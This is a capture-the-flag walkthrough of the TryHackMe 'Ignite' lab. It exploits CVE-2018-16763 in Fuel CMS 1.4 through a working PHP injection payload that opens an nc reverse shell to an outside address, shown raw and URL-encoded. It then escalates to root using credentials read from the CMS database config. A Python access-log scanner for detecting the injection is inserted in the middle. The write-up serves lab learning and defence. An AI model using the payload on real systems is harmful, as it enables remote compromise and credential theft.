Link: https://tryhackme.com/room/ignite
#1 “User.txt”
First, we access: http://10.10.237.127/
![](https://niekdang.wordpress.com/wp-content/uploads/2021/04/image-209.png?w=1024)
The page shows that the site is running Fuel CMS version 1.4. A little research shows that this version has a vulnerability, CVE-2018-16763.
Scrolling down, we find a login link along with the admin credentials.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/04/image-213.png?w=766)
After logging in, we can exploit the vulnerability. The vulnerable endpoint is:
http://10.10.237.127/fuel/pages/select/?filter=
Stand up a netcat listener on port 1234.
nc -lvnp 1234
Trigger the shell with this payload:
'+pi(print($a='system'))+$a('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.63.158 1234 >/tmp/f')+'
URL-encoded:
http://10.10.237.127/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.6.63.158%201234%20%3E%2Ftmp%2Ff%27%29%2b%27
![](https://niekdang.wordpress.com/wp-content/uploads/2021/04/image-211.png?w=519)
And we find the user’s flag.
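On the defending side, the request above leaves a recognisable trace in the web server's access log. The following is an added example, not part of the original write-up: it decodes the `filter` parameter of requests to `/fuel/pages/select/` and flags values that carry PHP call syntax. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: Apache/nginx "combined" access-log format; only the client
# address and the request line are used.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
VULN_PATH = "/fuel/pages/select"  # endpoint named in the write-up

# A normal filter value is a plain search term. A quote followed by a PHP
# variable or a function call means code is being pushed toward the evaluator.
SUSPICIOUS = re.compile(r"""['"].*(\$\w+|\b\w+\s*\()""", re.S)

def fully_decode(value, rounds=3):
    """Request lines can be percent-encoded more than once; decode until stable."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_injection_attempts(lines):
    """Return (client_ip, decoded_filter) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.rstrip("/").endswith(VULN_PATH):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("filter", []):
            value = fully_decode(raw)
            if SUSPICIOUS.search(value):
                hits.append((m["ip"], value))
    return hits

# Constructed sample log lines (documentation addresses, harmless `id` command).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Apr/2021:10:01:00 +0000] "GET /fuel/pages/select/?filter=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Apr/2021:10:01:09 +0000] "GET /fuel/pages/select/?filter=O%27Brien HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Apr/2021:10:02:41 +0000] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27id%27)%2b%27 HTTP/1.1" 200 731 "-" "curl/7.68.0"',
    '203.0.113.5 - - [12/Apr/2021:10:03:02 +0000] "GET /fuel/pages/select/?filter=%2527%252bsystem(%2527id%2527)%252b%2527 HTTP/1.1" 200 731 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for ip, value in find_injection_attempts(SAMPLE_LOG):
        print(f"{ip} -> {value}")
```

A search term with an apostrophe, such as the second sample line, is not flagged because no variable or call follows the quote.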
#2 “Root.txt”
We enumerate the web application folder and find the database configuration file at /var/www/html/fuel/application/config/database.php.
Reading that file, we find root’s credentials. Use them to switch to root:
su -
And we find root’s flag.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/04/image-214.png?w=215)